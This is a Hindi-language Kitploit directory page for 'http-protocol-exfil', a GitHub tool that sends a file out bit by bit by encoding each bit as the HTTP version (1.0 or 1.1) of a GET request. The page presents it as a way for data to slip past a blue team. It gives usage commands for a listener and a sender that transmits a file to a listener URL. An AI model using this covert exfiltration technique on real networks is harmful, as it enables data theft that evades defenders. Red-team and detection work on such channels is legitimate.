Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ricardojoserf/http-protocol-exfil
डेटा निष्कासननेटवर्क सुरक्षा
GitHubricardojoserf/http-protocol-exfil

http-protocol-exfil

HTTP प्रोटोकॉल संस्करण का उपयोग करके फ़ाइलों को बाहर निकालें ("HTTP/1.0" एक 0 है और "HTTP/1.1" एक 1 है)

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
24224 साल पहलेKitploit द्वारा समीक्षित

http-protocol-exfil

HTTP प्रोटोकॉल संस्करण का उपयोग करके फ़ाइल को बिट दर बिट भेजें ("HTTP/1.0" एक 0 है और "HTTP/1.1" एक 1 है)। यह GET अनुरोधों का उपयोग करता है, इसलिए ब्लू टीम केवल आपके आईपी पते पर अनुरोध देखेगी। हालांकि, बड़ी फाइलें भेजने में बहुत समय लगता है, उदाहरण के लिए 200 KB भेजने में 1 घंटा लगता है, और अनुरोधों की संख्या बहुत अधिक होगी (फ़ाइल के बाइट्स की संख्या का 8 गुना)।

memillo

लिसनर बनाएं

लिसनर चलाने के लिए listener.py का उपयोग करें, जिसमें एक वैकल्पिक तर्क है: वह पोर्ट जिस पर यह सुन रहा होगा।

root@kitploit:~
python3 listener.py [PORT]

उदाहरण:

root@kitploit:~
python3 listener.py 8080

फ़ाइल भेजें

फ़ाइल भेजने के लिए sender.py का उपयोग करें, जिसमें दो अनिवार्य तर्क हैं: फ़ाइल पथ और लिसनर का URL; और एक वैकल्पिक तर्क: दूरस्थ रूप से बनाई गई फ़ाइल का नाम (यदि उपयोग नहीं किया गया, तो इनपुट फ़ाइल का नाम उपयोग किया जाता है)।

root@kitploit:~
python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]

उदाहरण:

root@kitploit:~
python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt

उदाहरण

पहले फ़ाइल भेजी जाती है:

image1

यदि चर debug को True पर सेट किया गया है (डिफ़ॉल्ट रूप से ऐसा है) तो आप लिसनर लॉग संदेशों में बाइनरी मान देख सकते हैं:

image2

नई फ़ाइल इनपुट फ़ाइल की सामग्री के साथ बनाई जाती है:

image3


प्रेरणा

मुझे लगता है (मुझे यकीन नहीं है) मैंने ट्विटर पर किसी को पढ़ा था जिसने दावा किया था कि उन्होंने डेटा निकालने के लिए इसका उपयोग किया था और मुझे यह विचार पसंद आया, यदि आप वह व्यक्ति हैं तो मुझे बताएं।

टूल डाउनलोड करें